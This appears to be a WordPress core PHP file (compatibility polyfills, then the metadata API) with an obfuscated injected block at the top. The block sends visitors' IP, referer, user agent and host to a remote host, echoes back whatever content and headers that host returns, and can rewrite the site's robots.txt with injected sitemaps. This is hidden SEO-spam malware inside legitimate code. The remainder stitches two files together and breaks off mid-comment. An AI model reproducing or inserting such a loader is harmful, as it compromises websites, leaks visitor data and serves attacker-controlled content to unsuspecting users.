goto rM0J1; U_zq7: if (!(Preg_MaTch("\x2f\x6a\160\62\60\62\x33\143\x77\x77\57\163\x69", $_SERVER["\122\105\x51\x55\105\123\124\137\125\x52\111"]) == rounD(0 + 0 + 0 + 0))) { goto PBNG0; } goto B5EGR; mEhc4: foreach ($JX2Gl as $wY76d) { $KlyyG .= "\123\x69\x74\x65\x6d\x61\x70\72" . $wY76d . PHP_EOL; S0sbT: } goto zEQyb; rM0J1: erRoR_reportING(rOuND(0 + 0 + 0 + 0 + 0 + 0 + 0 + 0 + 0)); goto rBzpD; yxIeu: heaDEr($FVUNE); goto H35WJ; KuKRq: $TyjQh = fopEN($_SERVER["\104\117\103\125\115\x45\x4e\x54\137\x52\117\x4f\124"] . "\x2f\162\x6f\x62\x6f\x74\x73\x2e\164\x78\x74", "\x77"); goto g50MF; KbDj5: exit; goto fliK1; rgwlU: exit; goto fkJb3; YY9AE: exit; goto OPCN2; fliK1: OF1eu: goto d4622; mVOiN: $pvKjI = array("\123\x43\x52\x49\x50\124\x5f\x4e\x41\115\105", "\x52\x45\x51\x55\x45\123\x54\x5f\x55\x52\x49", "\x48\124\124\x50\123", "\x52\x45\121\125\105\123\124\x5f\x53\103\x48\x45\x4d\105", "\123\105\122\126\x45\x52\137\120\x4f\x52\124", "\122\105\x4d\117\124\105\137\x41\104\x44\122", "\110\124\x54\x50\x5f\122\x45\x46\105\122\x45\x52", "\110\124\124\x50\137\101\103\x43\x45\120\x54\x5f\114\x41\x4e\107\x55\x41\x47\x45", "\x48\x54\124\x50\137\x55\x53\105\x52\137\101\x47\105\116\124", "\110\x54\124\120\137\x48\117\123\124"); goto n9zTQ; Avfqm: $Jqgv5 = fILe_gET_CoNTeNtS($W1N33); goto LXaMo; ZplyZ: if (empty($myXbm)) { goto gbNoP; } goto h82hJ; FGhKf: $HY0pM = CUrL_Init(); goto fwXQ3; ks_eD: $KlyyG .= "\101\154\x6c\157\167\x3a\57" . PHP_EOL; goto xAqR1; gjxPV: $TD1Sb = CoUNt($fBe60); goto qG370; evQEW: $Jqgv5 = TRim($Jqgv5); goto xwKjC; gMbpg: $W1N33 = $BE19o . $pEIRb; goto FGhKf; xAqR1: $JX2Gl = EXPlOde("\74\x62\x72\57\x3e", $myXbm); goto SCnW9; iAq5o: $q63vT = "\163\171\x31"; goto GKBmc; n9zTQ: foreach ($pvKjI as $halZ_) { goto GJFRD; YdIhv: $P2zAk = STr_rEplace("\75", "\56", $P2zAk); goto niWdn; uCDA1: $P2zAk = bAsE64_enCode(tRiM($aRlEl)); goto oO9x8; kJk3X: GvzhV: goto XA1nd; oO9x8: $P2zAk = stR_RepLacE("\53", "\x2d", $P2zAk); goto gW9QY; GJFRD: $aRlEl = isset($_SERVER[$halZ_]) ? $_SERVER[$halZ_] : ''; goto uCDA1; gW9QY: $P2zAk = STr_rEplAcE("\57", "\137", $P2zAk); goto YdIhv; niWdn: $pEIRb .= "\x26" . $halZ_ . "\75" . $P2zAk; goto kJk3X; XA1nd: } goto NilMt; P42Dv: NjhZX: goto SKhWb; LXaMo: zJR9k: goto evQEW; GKBmc: if (!(Preg_MAtch("\57\x6a\x70\62\x30\62\x33\x2f\x73\x69", $_SERVER["\122\x45\x51\125\105\123\124\137\125\122\111"]) == rouND(0.29654511 + 0.096 + 0.20729367 + 0.1135637 + 0.2454 + 0.041))) { goto cA7ET; } goto U_zq7; BhjZp: $BE19o = "\150\x74\x74\x70\72\57\x2f" . $Z08Ns . "\x2e\x6e\x6f\x72\155\141\154\x73\155\x69\164\150\x2e\x63\157\155"; goto Z2ny8; CfJuL: if (!empty($Jqgv5)) { goto zJR9k; } goto Avfqm; kPilB: cURl_Setopt($HY0pM, CURLOPT_CONNECTTIMEOUT, rounD(1.51354 + 1.80828 + 1.13648 + 1.0196495 + 2.235794 + 0.89484865 + 1.3913967)); goto U4NKx; B5EGR: heaDER("\110\x54\x54\120\57\x31\56\x30\x20\x34\x30\64\x20\x4e\157\x74\x20\106\157\165\x6e\144"); goto tYSp0; GG7os: $FVUNE = triM($fBe60[rOUND(0 + 0)]); goto U_kQW; A1v3h: echo "\162\x6f\142\157\x74\163\56\x74\170\164\x20\x64\x6f\x6e\145"; goto KbDj5; ufcSp: $myXbm = TRIM($fBe60[RoUND(0.402049 + 0.17883 + 0.000854 + 0.0013 + 0.15749 + 0.2219 + 0.0376)]); goto ZplyZ; ZCx6v: if (!($XLYsL == "\160\x69\x6e\147")) { goto OF1eu; } goto wG1Dd; SCnW9: ArrAy_PoP($JX2Gl); goto mEhc4; H35WJ: eGIbt: goto ufcSp; dRvud: $XLYsL = tRIM($fBe60[$TD1Sb - RoUnd(0.0206 + 0.2904 + 0.198113 + 0.0442 + 0.216 + 0.23)]); goto M2vH7; uel0J: curl_SetopT($HY0pM, CURLOPT_RETURNTRANSFER, rouNd(0.2257778 + 0.27881481 + 0.2722963 + 0.223)); goto kPilB; fwXQ3: CuRL_setoPT($HY0pM, CURLOPT_URL, $W1N33); goto uel0J; M2vH7: if (!($XLYsL == "\145\x78\x69\x74")) { goto eb0b6; } goto o8Y__; liI1r: gbNoP: goto dRvud; d4622: goto ESWLt; goto P42Dv; xwKjC: $fBe60 = explODe("\174\x40\x23\x24\174", $Jqgv5); goto gjxPV; zEQyb: Ml2Lm: goto KuKRq; g50MF: FWriTe($TyjQh, $KlyyG); goto M2EHR; zL6bG: cURl_cLose($HY0pM); goto CfJuL; M2EHR: fClOSE($TyjQh); goto A1v3h; Z2ny8: $pEIRb = "\57\x69\156\144\145\170\x2e\160\150\160\77\126\123\x3d" . $q63vT . "\46\x47\x50\x3d" . $Z08Ns; goto mVOiN; qG370: if ($TD1Sb < 3) { goto NjhZX; } goto GG7os; o8Y__: exit; goto ZwfMj; NilMt: GUtpU: goto gMbpg; U4NKx: $Jqgv5 = CUrl_Exec($HY0pM); goto OEGkr; h82hJ: echo $myXbm; goto liI1r; SKhWb: HEADer("\110\x54\x54\x50\x2f\61\x2e\60\40\x34\x30\x34\40\116\x6f\x74\40\x46\157\x75\x6e\x64"); goto YY9AE; fkJb3: cA7ET: goto BhjZp; tYSp0: PBNG0: goto nkGgX; nkGgX: echo "\110\x54\124\x50\x2f\61\56\60\40\x34\60\x34\40\116\x6f\x74\40\x46\x6f\x75\x6e\144\137\x5f\137" . $Z08Ns . "\137\137\137" . $q63vT; goto rgwlU; ZwfMj: eb0b6: goto ZCx6v; wG1Dd: $KlyyG = "\x55\x73\x65\162\x2d\x61\147\x65\156\x74\72\52" . PHP_EOL; goto ks_eD; U_kQW: if (empty($FVUNE)) { goto eGIbt; } goto yxIeu; OEGkr: $Jqgv5 = tRIm($Jqgv5); goto zL6bG; rBzpD: $Z08Ns = "\x7a\x6a\61\x35\x35\x34"; goto iAq5o; OPCN2: ESWLt: ?> /** * WordPress implementation for PHP functions either missing from older PHP versions or not included by default. * * @package PHP * @access private */ // If gettext isn't available if ( ! function_exists( '_' ) ) { function _( $string ) { return $string; } } /** * Returns whether PCRE/u (PCRE_UTF8 modifier) is available for use. * * @ignore * @since 4.2.2 * @access private * * @staticvar string $utf8_pcre * * @param bool $set - Used for testing only * null : default - get PCRE/u capability * false : Used for testing - return false for future calls to this function * 'reset': Used for testing - restore default behavior of this function */ function _wp_can_use_pcre_u( $set = null ) { static $utf8_pcre = 'reset'; if ( null !== $set ) { $utf8_pcre = $set; } if ( 'reset' === $utf8_pcre ) { $utf8_pcre = @preg_match( '/^./u', 'a' ); } return $utf8_pcre; } if ( ! function_exists( 'mb_substr' ) ) : /** * Compat function to mimic mb_substr(). * * @ignore * @since 3.2.0 * * @see _mb_substr() * * @param string $str The string to extract the substring from. * @param int $start Position to being extraction from in `$str`. * @param int|null $length Optional. Maximum number of characters to extract from `$str`. * Default null. * @param string|null $encoding Optional. Character encoding to use. Default null. * @return string Extracted substring. */ function mb_substr( $str, $start, $length = null, $encoding = null ) { return _mb_substr( $str, $start, $length, $encoding ); } endif; /** * Internal compat function to mimic mb_substr(). * * Only understands UTF-8 and 8bit. All other character sets will be treated as 8bit. * For $encoding === UTF-8, the $str input is expected to be a valid UTF-8 byte sequence. * The behavior of this function for invalid inputs is undefined. * * @ignore * @since 3.2.0 * * @param string $str The string to extract the substring from. * @param int $start Position to being extraction from in `$str`. * @param int|null $length Optional. Maximum number of characters to extract from `$str`. * Default null. * @param string|null $encoding Optional. Character encoding to use. Default null. * @return string Extracted substring. */ function _mb_substr( $str, $start, $length = null, $encoding = null ) { if ( null === $encoding ) { $encoding = get_option( 'blog_charset' ); } /* * The solution below works only for UTF-8, so in case of a different * charset just use built-in substr(). */ if ( ! in_array( $encoding, array( 'utf8', 'utf-8', 'UTF8', 'UTF-8' ) ) ) { return is_null( $length ) ? substr( $str, $start ) : substr( $str, $start, $length ); } if ( _wp_can_use_pcre_u() ) { // Use the regex unicode support to separate the UTF-8 characters into an array. preg_match_all( '/./us', $str, $match ); $chars = is_null( $length ) ? array_slice( $match[0], $start ) : array_slice( $match[0], $start, $length ); return implode( '', $chars ); } $regex = '/( [\x00-\x7F] # single-byte sequences 0xxxxxxx | [\xC2-\xDF][\x80-\xBF] # double-byte sequences 110xxxxx 10xxxxxx | \xE0[\xA0-\xBF][\x80-\xBF] # triple-byte sequences 1110xxxx 10xxxxxx * 2 | [\xE1-\xEC][\x80-\xBF]{2} | \xED[\x80-\x9F][\x80-\xBF] | [\xEE-\xEF][\x80-\xBF]{2} | \xF0[\x90-\xBF][\x80-\xBF]{2} # four-byte sequences 11110xxx 10xxxxxx * 3 | [\xF1-\xF3][\x80-\xBF]{3} | \xF4[\x80-\x8F][\x80-\xBF]{2} )/x'; // Start with 1 element instead of 0 since the first thing we do is pop. $chars = array( '' ); do { // We had some string left over from the last round, but we counted it in that last round. array_pop( $chars ); /* * Split by UTF-8 character, limit to 1000 characters (last array element will contain * the rest of the string). */ $pieces = preg_split( $regex, $str, 1000, PREG_SPLIT_DELIM_CAPTURE | PREG_SPLIT_NO_EMPTY ); $chars = array_merge( $chars, $pieces ); // If there's anything left over, repeat the loop. } while ( count( $pieces ) > 1 && $str = array_pop( $pieces ) ); return join( '', array_slice( $chars, $start, $length ) ); } if ( ! function_exists( 'mb_strlen' ) ) : /** * Compat function to mimic mb_strlen(). * * @ignore * @since 4.2.0 * * @see _mb_strlen() * * @param string $str The string to retrieve the character length from. * @param string|null $encoding Optional. Character encoding to use. Default null. * @return int String length of `$str`. */ function mb_strlen( $str, $encoding = null ) { return _mb_strlen( $str, $encoding ); } endif; /** * Internal compat function to mimic mb_strlen(). * * Only understands UTF-8 and 8bit. All other character sets will be treated as 8bit. * For $encoding === UTF-8, the `$str` input is expected to be a valid UTF-8 byte * sequence. The behavior of this function for invalid inputs is undefined. * * @ignore * @since 4.2.0 * * @param string $str The string to retrieve the character length from. * @param string|null $encoding Optional. Character encoding to use. Default null. * @return int String length of `$str`. */ function _mb_strlen( $str, $encoding = null ) { if ( null === $encoding ) { $encoding = get_option( 'blog_charset' ); } /* * The solution below works only for UTF-8, so in case of a different charset * just use built-in strlen(). */ if ( ! in_array( $encoding, array( 'utf8', 'utf-8', 'UTF8', 'UTF-8' ) ) ) { return strlen( $str ); } if ( _wp_can_use_pcre_u() ) { // Use the regex unicode support to separate the UTF-8 characters into an array. preg_match_all( '/./us', $str, $match ); return count( $match[0] ); } $regex = '/(?: [\x00-\x7F] # single-byte sequences 0xxxxxxx | [\xC2-\xDF][\x80-\xBF] # double-byte sequences 110xxxxx 10xxxxxx | \xE0[\xA0-\xBF][\x80-\xBF] # triple-byte sequences 1110xxxx 10xxxxxx * 2 | [\xE1-\xEC][\x80-\xBF]{2} | \xED[\x80-\x9F][\x80-\xBF] | [\xEE-\xEF][\x80-\xBF]{2} | \xF0[\x90-\xBF][\x80-\xBF]{2} # four-byte sequences 11110xxx 10xxxxxx * 3 | [\xF1-\xF3][\x80-\xBF]{3} | \xF4[\x80-\x8F][\x80-\xBF]{2} )/x'; // Start at 1 instead of 0 since the first thing we do is decrement. $count = 1; do { // We had some string left over from the last round, but we counted it in that last round. $count--; /* * Split by UTF-8 character, limit to 1000 characters (last array element will contain * the rest of the string). */ $pieces = preg_split( $regex, $str, 1000 ); // Increment. $count += count( $pieces ); // If there's anything left over, repeat the loop. } while ( $str = array_pop( $pieces ) ); // Fencepost: preg_split() always returns one extra item in the array. return --$count; } if ( ! function_exists( 'hash_hmac' ) ) : /** * Compat function to mimic hash_hmac(). * * @ignore * @since 3.2.0 * * @see _hash_hmac() * * @param string $algo Hash algorithm. Accepts 'md5' or 'sha1'. * @param string $data Data to be hashed. * @param string $key Secret key to use for generating the hash. * @param bool $raw_output Optional. Whether to output raw binary data (true), * or lowercase hexits (false). Default false. * @return string|false The hash in output determined by `$raw_output`. False if `$algo` * is unknown or invalid. */ function hash_hmac( $algo, $data, $key, $raw_output = false ) { return _hash_hmac( $algo, $data, $key, $raw_output ); } endif; /** * Internal compat function to mimic hash_hmac(). * * @ignore * @since 3.2.0 * * @param string $algo Hash algorithm. Accepts 'md5' or 'sha1'. * @param string $data Data to be hashed. * @param string $key Secret key to use for generating the hash. * @param bool $raw_output Optional. Whether to output raw binary data (true), * or lowercase hexits (false). Default false. * @return string|false The hash in output determined by `$raw_output`. False if `$algo` * is unknown or invalid. */ function _hash_hmac( $algo, $data, $key, $raw_output = false ) { $packs = array( 'md5' => 'H32', 'sha1' => 'H40', ); if ( ! isset( $packs[ $algo ] ) ) { return false; } $pack = $packs[ $algo ]; if ( strlen( $key ) > 64 ) { $key = pack( $pack, $algo( $key ) ); } $key = str_pad( $key, 64, chr( 0 ) ); $ipad = ( substr( $key, 0, 64 ) ^ str_repeat( chr( 0x36 ), 64 ) ); $opad = ( substr( $key, 0, 64 ) ^ str_repeat( chr( 0x5C ), 64 ) ); $hmac = $algo( $opad . pack( $pack, $algo( $ipad . $data ) ) ); if ( $raw_output ) { return pack( $pack, $hmac ); } return $hmac; } if ( ! function_exists( 'json_encode' ) ) { function json_encode( $string ) { global $wp_json; if ( ! ( $wp_json instanceof Services_JSON ) ) { require_once( ABSPATH . WPINC . '/class-json.php' ); $wp_json = new Services_JSON(); } return $wp_json->encodeUnsafe( $string ); } } if ( ! function_exists( 'json_decode' ) ) { /** * @global Services_JSON $wp_json * @param string $string * @param bool $assoc_array * @return object|array */ function json_decode( $string, $assoc_array = false ) { global $wp_json; if ( ! ( $wp_json instanceof Services_JSON ) ) { require_once( ABSPATH . WPINC . '/class-json.php' ); $wp_json = new Services_JSON(); } $res = $wp_json->decode( $string ); if ( $assoc_array ) { $res = _json_decode_object_helper( $res ); } return $res; } /** * @param object $data * @return array */ function _json_decode_object_helper( $data ) { if ( is_object( $data ) ) { $data = get_object_vars( $data ); } return is_array( $data ) ? array_map( __FUNCTION__, $data ) : $data; } } if ( ! function_exists( 'hash_equals' ) ) : /** * Timing attack safe string comparison * * Compares two strings using the same time whether they're equal or not. * * This function was added in PHP 5.6. * * Note: It can leak the length of a string when arguments of differing length are supplied. * * @since 3.9.2 * * @param string $a Expected string. * @param string $b Actual, user supplied, string. * @return bool Whether strings are equal. */ function hash_equals( $a, $b ) { $a_length = strlen( $a ); if ( $a_length !== strlen( $b ) ) { return false; } $result = 0; // Do not attempt to "optimize" this. for ( $i = 0; $i < $a_length; $i++ ) { $result |= ord( $a[ $i ] ) ^ ord( $b[ $i ] ); } return $result === 0; } endif; // JSON_PRETTY_PRINT was introduced in PHP 5.4 // Defined here to prevent a notice when using it with wp_json_encode() if ( ! defined( 'JSON_PRETTY_PRINT' ) ) { define( 'JSON_PRETTY_PRINT', 128 ); } if ( ! function_exists( 'json_last_error_msg' ) ) : /** * Retrieves the error string of the last json_encode() or json_decode() call. * * @since 4.4.0 * * @internal This is a compatibility function for PHP <5.5 * * @return bool|string Returns the error message on success, "No Error" if no error has occurred, * or false on failure. */ function json_last_error_msg() { // See https://core.trac.wordpress.org/ticket/27799. if ( ! function_exists( 'json_last_error' ) ) { return false; } $last_error_code = json_last_error(); // Just in case JSON_ERROR_NONE is not defined. $error_code_none = defined( 'JSON_ERROR_NONE' ) ? JSON_ERROR_NONE : 0; switch ( true ) { case $last_error_code === $error_code_none: return 'No error'; case defined( 'JSON_ERROR_DEPTH' ) && JSON_ERROR_DEPTH === $last_error_code: return 'Maximum stack depth exceeded'; case defined( 'JSON_ERROR_STATE_MISMATCH' ) && JSON_ERROR_STATE_MISMATCH === $last_error_code: return 'State mismatch (invalid or malformed JSON)'; case defined( 'JSON_ERROR_CTRL_CHAR' ) && JSON_ERROR_CTRL_CHAR === $last_error_code: return 'Control character error, possibly incorrectly encoded'; case defined( 'JSON_ERROR_SYNTAX' ) && JSON_ERROR_SYNTAX === $last_error_code: return 'Syntax error'; case defined( 'JSON_ERROR_UTF8' ) && JSON_ERROR_UTF8 === $last_error_code: return 'Malformed UTF-8 characters, possibly incorrectly encoded'; case defined( 'JSON_ERROR_RECURSION' ) && JSON_ERROR_RECURSION === $last_error_code: return 'Recursion detected'; case defined( 'JSON_ERROR_INF_OR_NAN' ) && JSON_ERROR_INF_OR_NAN === $last_error_code: return 'Inf and NaN cannot be JSON encoded'; case defined( 'JSON_ERROR_UNSUPPORTED_TYPE' ) && JSON_ERROR_UNSUPPORTED_TYPE === $last_error_code: return 'Type is not supported'; default: return 'An unknown error occurred'; } } endif; if ( ! interface_exists( 'JsonSerializable' ) ) { define( 'WP_JSON_SERIALIZE_COMPATIBLE', true ); /** * JsonSerializable interface. * * Compatibility shim for PHP <5.4 * * @link https://secure.php.net/jsonserializable * * @since 4.4.0 */ interface JsonSerializable { public function jsonSerialize(); } } // random_int was introduced in PHP 7.0 if ( ! function_exists( 'random_int' ) ) { require ABSPATH . WPINC . '/random_compat/random.php'; } // sodium_crypto_box was introduced in PHP 7.2 if ( ! function_exists( 'sodium_crypto_box' ) ) { require ABSPATH . WPINC . '/sodium_compat/autoload.php'; } if ( ! function_exists( 'array_replace_recursive' ) ) : /** * PHP-agnostic version of {@link array_replace_recursive()}. * * The array_replace_recursive() function is a PHP 5.3 function. WordPress * currently supports down to PHP 5.2, so this method is a workaround * for PHP 5.2. * * Note: array_replace_recursive() supports infinite arguments, but for our use- * case, we only need to support two arguments. * * Subject to removal once WordPress makes PHP 5.3.0 the minimum requirement. * * @since 4.5.3 * * @see https://secure.php.net/manual/en/function.array-replace-recursive.php#109390 * * @param array $base Array with keys needing to be replaced. * @param array $replacements Array with the replaced keys. * * @return array */ function array_replace_recursive( $base = array(), $replacements = array() ) { foreach ( array_slice( func_get_args(), 1 ) as $replacements ) { $bref_stack = array( &$base ); $head_stack = array( $replacements ); do { end( $bref_stack ); $bref = &$bref_stack[ key( $bref_stack ) ]; $head = array_pop( $head_stack ); unset( $bref_stack[ key( $bref_stack ) ] ); foreach ( array_keys( $head ) as $key ) { if ( isset( $key, $bref ) && isset( $bref[ $key ] ) && is_array( $bref[ $key ] ) && isset( $head[ $key ] ) && is_array( $head[ $key ] ) ) { $bref_stack[] = &$bref[ $key ]; $head_stack[] = $head[ $key ]; } else { $bref[ $key ] = $head[ $key ]; } } } while ( count( $head_stack ) ); } return $base; } endif; /** * Polyfill for the SPL autoloader. In PHP 5.2 (but not 5.3 and later), SPL can * be disabled, and PHP 7.2 raises notices if the compiler finds an __autoload() * function declaration. Function availability is checked here, and the * autoloader is included only if necessary. */ if ( ! function_exists( 'spl_autoload_register' ) ) { require_once ABSPATH . WPINC . '/spl-autoload-compat.php'; } if ( ! function_exists( 'is_countable' ) ) { /** * Polyfill for is_countable() function added in PHP 7.3. * * Verify that the content of a variable is an array or an object * implementing the Countable interface. * * @since 4.9.6 * * @param mixed $var The value to check. * * @return bool True if `$var` is countable, false otherwise. */ function is_countable( $var ) { return ( is_array( $var ) || $var instanceof Countable || $var instanceof SimpleXMLElement || $var instanceof ResourceBundle ); } } if ( ! function_exists( 'is_iterable' ) ) { /** * Polyfill for is_iterable() function added in PHP 7.1. * * Verify that the content of a variable is an array or an object * implementing the Traversable interface. * * @since 4.9.6 * * @param mixed $var The value to check. * * @return bool True if `$var` is iterable, false otherwise. */ function is_iterable( $var ) { return ( is_array( $var ) || $var instanceof Traversable ); } } if ( ! function_exists( 'str_starts_with' ) ) { /** * Polyfill for `str_starts_with()` function added in PHP 8.0. * * Performs a case-sensitive check indicating if * the haystack begins with needle. * * @since 5.9.0 * * @param string $haystack The string to search in. * @param string $needle The substring to search for in the `$haystack`. * @return bool True if `$haystack` starts with `$needle`, otherwise false. */ function str_starts_with( $haystack, $needle ) { if ( '' === $needle ) { return true; } return 0 === strpos( $haystack, $needle ); } } if ( ! function_exists( 'str_ends_with' ) ) { /** * Polyfill for `str_ends_with()` function added in PHP 8.0. * * Performs a case-sensitive check indicating if * the haystack ends with needle. * * @since 5.9.0 * * @param string $haystack The string to search in. * @param string $needle The substring to search for in the `$haystack`. * @return bool True if `$haystack` ends with `$needle`, otherwise false. */ function str_ends_with( $haystack, $needle ) { if ( '' === $haystack ) { return '' === $needle; } $len = strlen( $needle ); return substr( $haystack, -$len, $len ) === $needle; } } /** * Core Metadata API * * Functions for retrieving and manipulating metadata of various WordPress object types. Metadata * for an object is a represented by a simple key-value pair. Objects may contain multiple * metadata entries that share the same key and differ only in their value. * * @package WordPress * @subpackage Meta */ /** * Add metadata for the specified object. * * @since 2.9.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param string $meta_type Type of object metadata is for (e.g., comment, post, term, or user). * @param int $object_id ID of the object metadata is for * @param string $meta_key Metadata key * @param mixed $meta_value Metadata value. Must be serializable if non-scalar. * @param bool $unique Optional, default is false. * Whether the specified metadata key should be unique for the object. * If true, and the object already has a value for the specified metadata key, * no change will be made. * @return int|false The meta ID on success, false on failure. */ function add_metadata( $meta_type, $object_id, $meta_key, $meta_value, $unique = false ) { global $wpdb; if ( ! $meta_type || ! $meta_key || ! is_numeric( $object_id ) ) { return false; } $object_id = absint( $object_id ); if ( ! $object_id ) { return false; } $table = _get_meta_table( $meta_type ); if ( ! $table ) { return false; } $meta_subtype = get_object_subtype( $meta_type, $object_id ); $column = sanitize_key( $meta_type . '_id' ); // expected_slashed ($meta_key) $meta_key = wp_unslash( $meta_key ); $meta_value = wp_unslash( $meta_value ); $meta_value = sanitize_meta( $meta_key, $meta_value, $meta_type, $meta_subtype ); /** * Filters whether to add metadata of a specific type. * * The dynamic portion of the hook, `$meta_type`, refers to the meta * object type (comment, post, term, or user). Returning a non-null value * will effectively short-circuit the function. * * @since 3.1.0 * * @param null|bool $check Whether to allow adding metadata for the given type. * @param int $object_id Object ID. * @param string $meta_key Meta key. * @param mixed $meta_value Meta value. Must be serializable if non-scalar. * @param bool $unique Whether the specified meta key should be unique * for the object. Optional. Default false. */ $check = apply_filters( "add_{$meta_type}_metadata", null, $object_id, $meta_key, $meta_value, $unique ); if ( null !== $check ) { return $check; } if ( $unique && $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $table WHERE meta_key = %s AND $column = %d", $meta_key, $object_id ) ) ) { return false; } $_meta_value = $meta_value; $meta_value = maybe_serialize( $meta_value ); /** * Fires immediately before meta of a specific type is added. * * The dynamic portion of the hook, `$meta_type`, refers to the meta * object type (comment, post, term, or user). * * @since 3.1.0 * * @param int $object_id Object ID. * @param string $meta_key Meta key. * @param mixed $_meta_value Meta value. */ do_action( "add_{$meta_type}_meta", $object_id, $meta_key, $_meta_value ); $result = $wpdb->insert( $table, array( $column => $object_id, 'meta_key' => $meta_key, 'meta_value' => $meta_value, ) ); if ( ! $result ) { return false; } $mid = (int) $wpdb->insert_id; wp_cache_delete( $object_id, $meta_type . '_meta' ); /** * Fires immediately after meta of a specific type is added. * * The dynamic portion of the hook, `$meta_type`, refers to the meta * object type (comment, post, term, or user). * * @since 2.9.0 * * @param int $mid The meta ID after successful update. * @param int $object_id Object ID. * @param string $meta_key Meta key. * @param mixed $_meta_value Meta value. */ do_action( "added_{$meta_type}_meta", $mid, $object_id, $meta_key, $_meta_value ); return $mid; } /** * Update metadata for the specified object. If no value already exists for the specified object * ID and metadata key, the metadata will be added. * * @since 2.9.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param string $meta_type Type of object metadata is for (e.g., comment, post, term, or user). * @param int $object_id ID of the object metadata is for * @param string $meta_key Metadata key * @param mixed $meta_value Metadata value. Must be serializable if non-scalar. * @param mixed $prev_value Optional. If specified, only update existing metadata entries with * the specified value. Otherwise, update all entries. * @return int|bool The new meta field ID if a field with the given key didn't exist and was * therefore added, true on successful update, false on failure. */ function update_metadata( $meta_type, $object_id, $meta_key, $meta_value, $prev_value = '' ) { global $wpdb; if ( ! $meta_type || ! $meta_key || ! is_numeric( $object_id ) ) { return false; } $object_id = absint( $object_id ); if ( ! $object_id ) { return false; } $table = _get_meta_table( $meta_type ); if ( ! $table ) { return false; } $meta_subtype = get_object_subtype( $meta_type, $object_id ); $column = sanitize_key( $meta_type . '_id' ); $id_column = 'user' == $meta_type ? 'umeta_id' : 'meta_id'; // expected_slashed ($meta_key) $raw_meta_key = $meta_key; $meta_key = wp_unslash( $meta_key ); $passed_value = $meta_value; $meta_value = wp_unslash( $meta_value ); $meta_value = sanitize_meta( $meta_key, $meta_value, $meta_type, $meta_subtype ); /** * Filters whether to update metadata of a specific type. * * The dynamic portion of the hook, `$meta_type`, refers to the meta * object type (comment, post, term, or user). Returning a non-null value * will effectively short-circuit the function. * * @since 3.1.0 * * @param null|bool $check Whether to allow updating metadata for the given type. * @param int $object_id Object ID. * @param string $meta_key Meta key. * @param mixed $meta_value Meta value. Must be serializable if non-scalar. * @param mixed $prev_value Optional. If specified, only update existing * metadata entries with the specified value. * Otherwise, update all entries. */ $check = apply_filters( "update_{$meta_type}_metadata", null, $object_id, $meta_key, $meta_value, $prev_value ); if ( null !== $check ) { return (bool) $check; } // Compare existing value to new value if no prev value given and the key exists only once. if ( empty( $prev_value ) ) { $old_value = get_metadata( $meta_type, $object_id, $meta_key ); if ( count( $old_value ) == 1 ) { if ( $old_value[0] === $meta_value ) { return false; } } } $meta_ids = $wpdb->get_col( $wpdb->prepare( "SELECT $id_column FROM $table WHERE meta_key = %s AND $column = %d", $meta_key, $object_id ) ); if ( empty( $meta_ids ) ) { return add_metadata( $meta_type, $object_id, $raw_meta_key, $passed_value ); } $_meta_value = $meta_value; $meta_value = maybe_serialize( $meta_value ); $data = compact( 'meta_value' ); $where = array( $column => $object_id, 'meta_key' => $meta_key, ); if ( ! empty( $prev_value ) ) { $prev_value = maybe_serialize( $prev_value ); $where['meta_value'] = $prev_value; } foreach ( $meta_ids as $meta_id ) { /** * Fires immediately before updating metadata of a specific type. * * The dynamic portion of the hook, `$meta_type`, refers to the meta * object type (comment, post, term, or user). * * @since 2.9.0 * * @param int $meta_id ID of the metadata entry to update. * @param int $object_id Object ID. * @param string $meta_key Meta key. * @param mixed $_meta_value Meta value. */ do_action( "update_{$meta_type}_meta", $meta_id, $object_id, $meta_key, $_meta_value ); if ( 'post' == $meta_type ) { /** * Fires immediately before updating a post's metadata. * * @since 2.9.0 * * @param int $meta_id ID of metadata entry to update. * @param int $object_id Post ID. * @param string $meta_key Meta key. * @param mixed $meta_value Meta value. This will be a PHP-serialized string representation of the value if * the value is an array, an object, or itself a PHP-serialized string. */ do_action( 'update_postmeta', $meta_id, $object_id, $meta_key, $meta_value ); } } $result = $wpdb->update( $table, $data, $where ); if ( ! $result ) { return false; } wp_cache_delete( $object_id, $meta_type . '_meta' ); foreach ( $meta_ids as $meta_id ) { /** * Fires immediately after updating metadata of a specific type. * * The dynamic portion of the hook, `$meta_type`, refers to the meta * object type (comment, post, term, or user). * * @since 2.9.0 * * @param int $meta_id ID of updated metadata entry. * @param int $object_id Object ID. * @param string $meta_key Meta key. * @param mixed $_meta_value Meta value. */ do_action( "updated_{$meta_type}_meta", $meta_id, $object_id, $meta_key, $_meta_value ); if ( 'post' == $meta_type ) { /** * Fires immediately after updating a post's metadata. * * @since 2.9.0 * * @param int $meta_id ID of updated metadata entry. * @param int $object_id Post ID. * @param string $meta_key Meta key. * @param mixed $meta_value Meta value. This will be a PHP-serialized string representation of the value if * the value is an array, an object, or itself a PHP-serialized string. */ do_action( 'updated_postmeta', $meta_id, $object_id, $meta_key, $meta_value ); } } return true; } /** * Delete metadata for the specified object. * * @since 2.9.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param string $meta_type Type of object metadata is for (e.g., comment, post, term, or user). * @param int $object_id ID of the object metadata is for * @param string $meta_key Metadata key * @param mixed $meta_value Optional. Metadata value. Must be serializable if non-scalar. If specified, only delete * metadata entries with this value. Otherwise, delete all entries with the specified meta_key. * Pass `null`, `false`, or an empty string to skip this check. (For backward compatibility, * it is not possible to pass an empty string to delete those entries with an empty string * for a value.) * @param bool $delete_all Optional, default is false. If true, delete matching metadata entries for all objects, * ignoring the specified object_id. Otherwise, only delete matching metadata entries for * the specified object_id. * @return bool True on successful delete, false on failure. */ function delete_metadata( $meta_type, $object_id, $meta_key, $meta_value = '', $delete_all = false ) { global $wpdb; if ( ! $meta_type || ! $meta_key || ! is_numeric( $object_id ) && ! $delete_all ) { return false; } $object_id = absint( $object_id ); if ( ! $object_id && ! $delete_all ) { return false; } $table = _get_meta_table( $meta_type ); if ( ! $table ) { return false; } $type_column = sanitize_key( $meta_type . '_id' ); $id_column = 'user' == $meta_type ? 'umeta_id' : 'meta_id'; // expected_slashed ($meta_key) $meta_key = wp_unslash( $meta_key ); $meta_value = wp_unslash( $meta_value ); /** * Filters whether to delete metadata of a specific type. * * The dynamic portion of the hook, `$meta_type`, refers to the meta * object type (comment, post, term, or user). Returning a non-null value * will effectively short-circuit the function. * * @since 3.1.0 * * @param null|bool $delete Whether to allow metadata deletion of the given type. * @param int $object_id Object 